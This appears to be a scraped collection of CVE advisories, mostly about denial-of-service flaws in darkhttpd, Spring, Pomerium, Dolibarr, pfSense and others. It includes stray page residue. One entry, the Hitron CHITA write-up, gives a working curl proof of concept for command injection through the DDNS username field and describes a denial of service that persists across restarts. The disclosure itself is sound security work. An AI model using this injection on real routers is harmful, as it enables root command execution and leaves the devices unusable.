A flaw was found in darkhttpd. Invalid error handling allows remote attackers to cause denial-of-service by accessing a file with a large modification date. The highest threat from this vulnerability is to system availability.

'1893725?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2020-25691: Invalid Bug ID

n Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.

All Vulnerability Reports

Severity

Medium

Vendor

Spring by VMware

Description

In Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.

Affected VMware Products and Versions

Severity is medium unless otherwise noted.

*   Spring Framework
    *   5.3.0 to 5.3.16
    *   Older, unsupported versions are also affected

Mitigation

Users of affected versions should upgrade to 5.3.17+. No other steps are necessary. Releases that have fixed this issue include:

*   Spring Framework
    *   5.3.17+

Credit

This vulnerability was initially discovered and responsibly reported by 4ra1n.

References

*   https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L
*   https://cwe.mitre.org/data/definitions/770.html

History

2022-03-28: Initial vulnerability report published.

CVE-2022-22950: CVE-2022-22950: Spring Expression DoS Vulnerability | Security

Improper Input Validation vulnerability in ABB 800xA, Control Software for AC 800M, Control Builder Safe, Compact Product Suite - Control and I/O, ABB Base Software for SoftControl allows an attacker to cause the denial of service.

CVE-2021-22277

IBM App Connect Enterprise Certified Container Dashboard UI (IBM App Connect Enterprise Certified Container 1.5, 2.0, 2.1, 3.0, and 3.1) may be vulnerable to denial of service due to excessive rate limiting.

CVE-2022-22404: IBM X-Force Exchange

Hitron CHITA 7.2.2.0.3b6-CD devices contain a command injection vulnerability via the Device/DDNS ddnsUsername field.

Hitron CHITA OS Command Injection (UPC Branded)

\# Exploit Title: Hitron CHITA OS Command Injection to DoS

\# Software: Hitron Technologies CHITA Router Firmware (UPC branded)

\# Version: 7.2.2.0.3b6-CD

\# Author: \`zaeek\` (GBTI SA)

\# CVE: TBA

\# CWE: CWE-77 | CWE-400

\# Date: 15.04.2021

\# CVSSv3: 9.1 (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)

Summary: A command injection vulnerability in Hitron CHITA router allows execution of OS commands. The injection vector resides at dynamic dns services "dyndns" configuration logic.

Due to improper sanitization of user-supplied data it is possible to input addition OS shell syntax together using a semicolon. To exploit this vulnerability, the attacker must be authenticated for web access.

Additionally it is possible to cause a Denial of Service by injecting a command which isn't limited by any argument (like \`ping\` command without \`-c\` delimiter), rendering the router software unstable and in the end, impossible to handle HTTP requests to web panel.

Even after router restart, the injected command is started during router startup, causing the router to being unusable without hard factory reset.

The Denial of Service case is a subject to deeper testing, because of the limited time which we were given to test it, together with the lack of second router to confirm the reproducibility.

PoC:

curl 'http://192.168.0.1/1/Device/DDNS' \\

\-H 'User-Agent: Mozilla/5.0 Firefox/85.0' \\

\-H 'Accept: application/json, text/javascript, \*/\*; q=0.01' \\

\-H 'Accept-Language: en-US,en;q=0.5' \\

\--compressed \\

\-H 'Content-Type: application/x-www-form-urlencoded' \\

\-H 'X-HTTP-Method-Override: PUT' \\

\-H 'X-Requested-With: XMLHttpRequest' \\

\-H 'Origin: http://192.168.0.1' \\

\-H 'DNT: 1' \\

\-H 'Authorization: Basic YWRtaW46YWNldHlsb2Nob2xpbmE=' \\

\-H 'Connection: keep-alive' -H 'Referer: http://192.168.0.1/webpages/index.html' \\

\-H 'Cookie: sessionindex=0&userid=e9JwY6BG6rPLnFXUM1mV6gK5Zxq7ND4Z; sessionToken=1586484992; SID=3920641792; preSession=nMQLZPa3pyBqbTvFmg7Eddn1QdxDX9n6; modelname=CHITA; LANG\_COOKIE=en\_US; isEdit=1; isEdit1=0; isEdit2=0; isEdit3=0; PHPSESSID=805d894df5e7cc7d3a39eecee5ca3824' \\

\-H 'Pragma: no-cache' \\

\-H 'Cache-Control: no-cache' \\

\--data-raw 'model=%7B%22errCode%22%3A%22000%22%2C%22errMsg%22%3A%22%22%2C%22ddnsOnOff%22%3A%22ON%22%2C%22ddnsSrvProvider%22%3A1%2C%22ddnsUsername%22%3A%22d\[\*\*INJECT CMD WITH SEMICOLON\*\*\]d%22%2C%22ddnsPassword%22%3A%22a%22%2C%22ddnsHostnames%22%3A%22asdasd.zapto.org%22%2C%22ddnsUpdateInterval%22%3A%22604800%22%2C%22id%22%3A%221%22%7D&csrf=1lomnjjnqtc00.771727mgis8w&\_method=PUT'

In the above curl example, an OS command inject vulnerability allows to execute local system binaries by replacing \`ddnsUsername\` parameter input or concatenating with direct OS command.

The injected command will be executed, most likely with root privileges. If the injected command is continuous (like no \`-c\` delimiter for \`ping\`), it will cause denial of service situation, because of underlying DDNS handler which is never finished.

CVE-2022-25017: Hitron CHITA OS Command Injection (UPC Branded)

An Out of Bounds read may potentially occur while processing an IBSS beacon, in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music

CVE-2021-35117: March 2022 Security Bulletin | Qualcomm

Pomerium is an identity-aware access proxy. In distributed service mode, Pomerium's Authenticate service exposes pprof debug and prometheus metrics handlers to untrusted traffic. This can leak potentially sensitive environmental information or lead to limited denial of service conditions. This issue is patched in version v0.17.1 Workarounds: Block access to `/debug` and `/metrics` paths on the authenticate service. This can be done with any L7 proxy, including Pomerium's own proxy service.

**Impact**

In distributed service mode, Pomerium's Authenticate service exposes pprof debug and prometheus metrics handlers to untrusted traffic. This can leak potentially sensitive environmental information or lead to limited denial of service conditions.

**Patches**

v0.17.1

**Workarounds**

Block access to /debug and /metrics paths on the authenticate service. This can be done with any L7 proxy, including Pomerium's own proxy service.

**References**

#3212

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in Pomerium
*   Email us at security@pomerium.com

CVE-2022-24797: Exposure of debug and metrics endpoints in Pomerium

**Impact**

In distributed service mode, Pomerium's Authenticate service exposes pprof debug and prometheus metrics handlers to untrusted traffic. This can leak potentially sensitive environmental information or lead to limited denial of service conditions.

**Patches**

v0.17.1

**Workarounds**

Block access to `/debug` and `/metrics` paths on the authenticate service. This can be done with any L7 proxy, including Pomerium's own proxy service.

**References**

#3212

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in Pomerium
*   Email us at security@pomerium.com

CVE-2022-24797: Build software better, together

An Access Control vulnerability exists in Dolibarr ERP/CRM 13.0.2, fixed version is 14.0.0,in the forgot-password function becuase the application allows email addresses as usernames, which can cause a Denial of Service.

@@ -1280,6 +1280,10 @@ public function create($user, $notrigger = 0)

$langs\->load("errors");

$this\->error = $langs\->trans("ErrorFieldRequired", $langs\->transnoentitiesnoconv("Login"));

return -1;

} elseif (preg\_match('/\[,@<>"\\'\]/', $this\->login)) {

$langs\->load("errors");

$this\->error = $langs\->trans("ErrorBadCharIntoLoginName");

return -1;

}

  

$this\->datec = dol\_now();

@@ -1669,6 +1673,10 @@ public function update($user, $notrigger = 0, $nosyncmember = 0, $nosyncmemberpa

$langs\->load("errors");

$this\->error = $langs\->trans("ErrorFieldRequired", 'Login');

return -1;

} elseif (preg\_match('/\[,@<>"\\'\]/', $this\->login)) {

$langs\->load("errors");

$this\->error = $langs\->trans("ErrorBadCharIntoLoginName");

return -1;

}

  

$this\->db\->begin();

CVE-2021-37517: Fix Improper Authorization Check reported by Ahsan Aziz. · Dolibarr/dolibarr@b57eb82

Improper input validation vulnerability in pfSense CE and pfSense Plus (pfSense CE software versions prior to 2.6.0 and pfSense Plus software versions prior to 22.01) allows a remote attacker with the privilege to change OpenVPN client or server settings to execute an arbitrary command.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= pfSense-SA-22\_03.webgui Security Advisory pfSense Topic: Multiple vulnerabilities in the WebGUI Category: pfSense Base System Module: webgui Announced: 2022-01-13 Credits: Yutaka WATANABE of Ierae Security, Inc. via JPCERT/CC CVE ID: CVE-2022-24299 Affects: pfSense Plus software versions < 22.01 pfSense CE software versions < 2.6.0 Corrected: 2022-01-14 17:24:32 UTC (pfSense Plus master) 2022-01-17 17:45:31 UTC (pfSense Plus 22.01) 2022-01-14 17:24:32 UTC (pfSense CE master) 2022-01-17 17:45:31 UTC (pfSense CE 2.6.0) 0. Revision History v1.2 2022-03-08 Removed JVN ID, added CVE ID, updated solution information. v1.1 2022-02-14 Fix Redmine link v1.0 2022-01-13 Initial SA draft I. Background pfSense® software is a free network firewall distribution based on the FreeBSD operating system. The pfSense software distribution includes third- party free software packages for additional functionality, and provides most of the functionality of common commercial firewalls. pfSense® Plus is the productized version of pfSense software from Netgate®, previously referred to as pfSense Factory Edition (FE). It is available to Netgate appliance and CSP customers. The majority of users of pfSense software have never installed or used a stock FreeBSD system. Unlike similar GNU/Linux-based firewall distributions, there is no need for any UNIX knowledge. The command line is never used, and there is no need to ever manually edit any rule sets. Instead, pfSense software includes a web interface for the configuration of all included components. Users familiar with commercial firewalls will quickly understand the web interface, while those unfamiliar with commercial-grade firewalls may encounter a short learning curve. II. Problem Description The vpn\_openvpn\_server.php and vpn\_openvpn\_client.php pages in the pfSense Plus and pfSense CE software GUI did not properly validate user input passed via the data\_ciphers parameter in certain cases. This problems is present on pfSense Plus version 21.05.2, pfSense CE version 2.5.2, and earlier versions of both. When the client or server mode was set to p2p\_shared\_key, the GUI did not validate user input in the data\_ciphers parameter but the backend code still included the value of data\_ciphers in the OpenVPN configuration. By passing carefully crafted data including parameters which allow OpenVPN to execute scripts, an attacker could execute arbitrary shell commands and read or write arbitrary files. NOTE: The Custom Options field on OpenVPN client and server configuration pages also allows this type of action intentionally, but that field has a separate privilege which can limit access to prevent users from altering its contents. III. Impact An authenticated attacker with access the to affected page, even without access to the Custom Options field, could execute arbitrary shell commands, perform privilege escalation, information disclosure, denial of service, or other negative outcomes. IV. Workaround To help mitigate the problem on older releases, use one or more of the following: \* Limit access to the affected pages to trusted administrators only. V. Solution Users can upgrade to pfSense Plus software version 22.01 or later when available, or pfSense CE software version 2.6.0 or later. This upgrade may be performed in the web interface or from the console. See https://docs.netgate.com/pfsense/en/latest/install/upgrade-guide.html Users on pfSense Plus version 21.05.2 or pfSense pfSense CE version 2.5.2 may apply the fix from the recommended patches list in the System Patches package. Users may also manually apply the relevant revisions below using the System Patches package on pfSense pfSense Plus version 21.05.2 or pfSense CE version 2.5.2 and possibly on earlier versions. See https://docs.netgate.com/pfsense/en/latest/development/system-patches.html VI. Correction details The following list contains the correction revision commit ID for each affected item. Branch/path Revision ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ plus/plus-master 78ce96a9af3b2ab5159ef6623078bfc4b15f8a89 ba815f3d219e5bdf404be859e723db2ff0c9258c plus/plus-RELENG\_22\_01 68afc597b0545b57b605ae8200954b1b5a89bcad fae2f2d553f42479721db67fc4ff1ddb70caeffa pfSense/master 78ce96a9af3b2ab5159ef6623078bfc4b15f8a89 ba815f3d219e5bdf404be859e723db2ff0c9258c pfSense/RELENG\_2\_6\_0 68afc597b0545b57b605ae8200954b1b5a89bcad fae2f2d553f42479721db67fc4ff1ddb70caeffa ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ VII. References The latest revision of this advisory is available at \-----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE40XvjEU56XSUPIMdE7mH/ZIU+NoFAmInWR0ACgkQE7mH/ZIU +NrSRQ//TZ79u1qK8Mrrc7XFc79EZPJGS7z4lK0OuhJ3V+ygFqkZEYPKjxxOBFWK 8SVn4NlzMTmiEoa136JhS4ONc519LNpLa/kaM0F0vuLcu/DywWpuzU6z5QpDL9jX kDmA9lCzY4pDU53Uuy3FTXO6BMgQTWaIS16fcUz+s0DdZi0hweZQypSBYZe48zmJ uzeJwY0TnDVYgJjriBn/nj6SMnN2DtSZmj+CpfHzQwTsl4P9RLXhoEBW9Vu0gaS7 cP1eKWWdJ1th5+Pt6KCFOuMiiWJ8O3j31xXSSsWiWLo7sUdd9It6CejaVP3w8cmn tMOw4m2pyeB+/H2Ao6hxqsFXGZv5gFPeUcVP82sJihtWMM4aZkP/rDSqUDC6cJwV fJ3hwfEhpfLFcxhlSDKAlLJSTQ9+Gnc7+0uC3mEcuDoApXuEo8yE0c6suqSKKsEb qvQiYERXPHrmDI+4y0msuEYUGbETS71ibZbpykiy1CQEKnnipO63WkOZ1XkCtv9P fwbiCN3xjz+XFKvT5EKJwhp0o0UjyYJxTjD8CLKQny0koy6mlo5R3J+5BjjktgYV RjlJJIxuRvscmmlrumUcuZdnsiK8Uvkw0YODzfjabm5SIf0E0OXIIfNv2jxjCdSX 5jZUNF70lGqSVrUz9JEeH+OfpMkGLf4CE/cBYIE7rGC257tDcLE= =n7jy -----END PGP SIGNATURE-----

Tag

#dos